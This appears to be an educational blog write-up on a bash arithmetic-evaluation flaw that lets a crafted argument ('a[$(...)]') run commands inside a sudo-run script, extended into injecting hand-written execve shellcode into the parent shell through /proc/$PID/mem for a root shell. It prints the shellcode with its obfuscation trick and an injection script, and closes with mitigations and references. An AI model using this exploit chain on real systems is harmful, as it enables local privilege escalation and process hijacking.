Injecting Code into a Linux Process
Say - entirely hypothetically - we know a shell script that is executed with root privileges via sudo and we found a way for normal users to convince it to call their own code.
For demonstration purposes it then would be nice to have code that invokes a local root shell, ready for interactive usage in the current terminal.
This article walks through from exploiting an easy to overlook flaw in a shell script to injecting shell-code into the running shell interpreter.
The Shell Backdoor¶
One would hope that a shell script that runs as root only does
minimal work, carefully verifies user controlled input, always
quotes all variables sufficiently and avoids well-known
problematic constructs such as invoking eval
.
This hope might or might not be legitimate.
However, there is one shell feature that isn't that well known and may be overlooked by some as an attack vector:
Command substitution as part of arithmetic expansion during arithmetic evaluation.
Consider this unsuspicious small example (say stored in blah.sh
):
#!/bin/bash
if [[ "$1" -lt "$2" ]]; then
echo hello
else
echo world
fi
Arguments are fully quoted so what could possibly go wrong, right?
Right?
Well, we can try to invoke it like this:
./blah.sh 'a[$(touch xyz)]' 23
Sure enough, the current working directory now contains a file
named xyz
.
NB: There are other constructs besides [[
where arithmetic
evaluation is applied, e.g. also in ((
.
A local interactive shell¶
Sure, strictly speaking, for demonstration purposes this is sufficient. It demonstrates clearly the flaw, and if this is inside some script an unprivileged user is allowed to invoke via a narrow sudo config, it's a local privilege escalation vulnerability.
But such a demo also is a little bit boring.
In order to make it more interesting, one may start a reverse shell, i.e. a shell that network connects back to the demo operator for interactive usage.
But arguably the best thing for such a demo is to simply invoke an interactive shell inside the current terminal.
Injecting code into a Linux Process¶
The challenge with our vector is that our user-controlled code is executed by the shell inside a sub-process while for a local interactive shell we need to inject code into the parent process.
We can use the following two Linux features for this injection:
/proc/$pid/syscall
to determine the program counter of the parent/proc/$pid/mem
for injecting code into the parent process
Since both processes are running under the same user - or even root, access to those files isn't restricted.
So the basic idea is, to let the sub-process inject something like the following into the parent process (at the current program counter):
char *cmd = "/bin/sh";
char *argv[2] = { cmd+5, 0 };
execve(cmd, argv, 0);
IOW, we want to inject some shellcode.
NB: Conveniently, the Linux Kernel works around any read-only permissions of code mappings.
Shellcode¶
Depending on how the shellcode is injected, its requirements vary:
- when injecting via a C-string the code must not contain any zero bytes
- it must not be too long
- some kind of obfuscation may be useful
For our running example those first two requirements clearly don't apply. However, not wasting too many bytes is always a good idea.
The first sub-challenge is to get the "/bin/sh"
string into
memory, since we are injecting code and can't simply put it into
the data segment.
A solution is to include the string as an intermediate integer, push it to the stack and reference that stack location.
In x86_64 assembler (Intel syntax):
mov rcx, 0x68732f6e69622f # "/bin/sh\0" reversed
push rcx
This works, but the shell then contains a zero byte and the
string shows up in strings
.
Alternatively, without any zero bytes and a little obfuscated:
# 150409396 * 195466812 - 1 = 0x68732f6e69622f
mov eax, 195466812
imul rax, rax, 150409396
dec rax
push rax
Other sub-challenges may involve using slightly non-obvious instruction sequences to save a few bytes.
Such as when setting the syscall number argument instead of a simple
mov eax, 0x3b # execve syscall nr,
using the equivalent:
xor eax, eax # the same, byt shorter and no zero byte ...
mov al, 0x3b # execve syscall nr
The complete shellcode I came up with is 32 byte large and reads:
0: 31 d2 xor edx,edx
2: b8 3c 96 a6 0b mov eax,0xba6963c
7: 48 69 c0 b4 10 f7 08 imul rax,rax,0x8f710b4
e: 48 ff c8 dec rax
11: 50 push rax
12: 48 89 e7 mov rdi,rsp
15: 52 push rdx
16: 57 push rdi
17: 31 c0 xor eax,eax
19: b0 3b mov al,0x3b
1b: 48 89 e6 mov rsi,rsp
1e: 0f 05 syscall
See also the my Git repository for the complete commented assembly source.
The process injection¶
The first reflex to write a few bytes to /proc/$pid/mem
may
be to use dd
.
However, dd
is cumbersome to use, is not everywhere available
and might even trigger some suspicion in process monitoring.
As an alternative, one can open and seek it in a shell script by other means.
A complete injection shell script example:
pc=$(cut -d ' ' -f9 /proc/$PPID/syscall)
exec {fd}<>/proc/$PPID/mem
<&$fd cmp -n 0 - - $pc
printf '\x31\xd2...\x48\x89\xe6\x0f\x05' >&$fd
echo Have fun ...>&2
Process injection into our running example is then as simple as:
$ ./blah.sh 'a[$(./inj.sh)]' 2
Have fun ...
sh-5.2$
Again, see also my Git repository for the complete script.
Mitigations¶
Since relatively much userspace is using those interfaces,
the Linux Kernel is hesitant to remove them or restrict
their usage. However, in recent kernel development there were some
efforts to provide a way for distributions to somewhat restrict
/proc/$pid/mem
usage.
It remains to be seen whether the Linux kernel merges something like that.
Of course, a Linux Security Module (LSM) such as SELinux might help to make the described techniques harder to exploit in some contexts.
Last but not least, it always makes sense to review the usage of shell scripting. Shell scripting often is the wrong tool for the job, especially in security sensitive contexts. And especially when a shell scripts grows large it's usually a sign that one should have switched over to a more appropriate implementation language, some time ago.
Related Work¶
The ideas and techniques described in this article aren't novel.
If one web-searches a bit around one can easily find decade(s) old references. Also people rediscover these bits and pieces from time to time.
Coming up with clever shellcode for various architectures is a sport on its own and people like to share their results. Thus, this article arguably also illustrates that getting started from first principles doesn't take too much effort, is very instructive and can be fun.
Selected list of related work:
- A /proc/PID/mem vulnerability. LWN, Jack Edge, 2012 - reports on pitfalls properly implementing that access in the kernel
- Re: Arithmetic + array allows for code injection. Bash bug mailing list, Maarten Billemont, 2014 - summarises that thread a bit
- Answer to Security Implications of using unsanitized data in Shell Arithmetic evaluation. Unix Stackexchange, Stéphane Chazelas, 2014 - also illustrates how to overwrite the PATH variable via arithmetic evaluation, i.e. when the CWD of the script is writable by an attacker
- Answer to Security implications of forgetting to quote a variable in bash/POSIX shells. Unix Stackexchange, Stéphane Chazelas, 2014 - covers more ground but also touches on arithmetic evaluation
- Bash’s white collar eval: [[ $var -eq 42 ]] runs arbitrary code too. Vidar, 2018 - Blog post on this topic
- Unprivileged Process Injection Techniques in Linux. joev, 2024 - Blog post that includes some historic references and shows limited usage of the metasploit framework
- Mastadon comment. Kees Cook, 2024 - this thread includes some misconceptions of knowledgable people which demonstrates the complexity of writing robust shell scripts in the presence of such obscure features
Code¶
See also my Git repository for all the source code used in this article.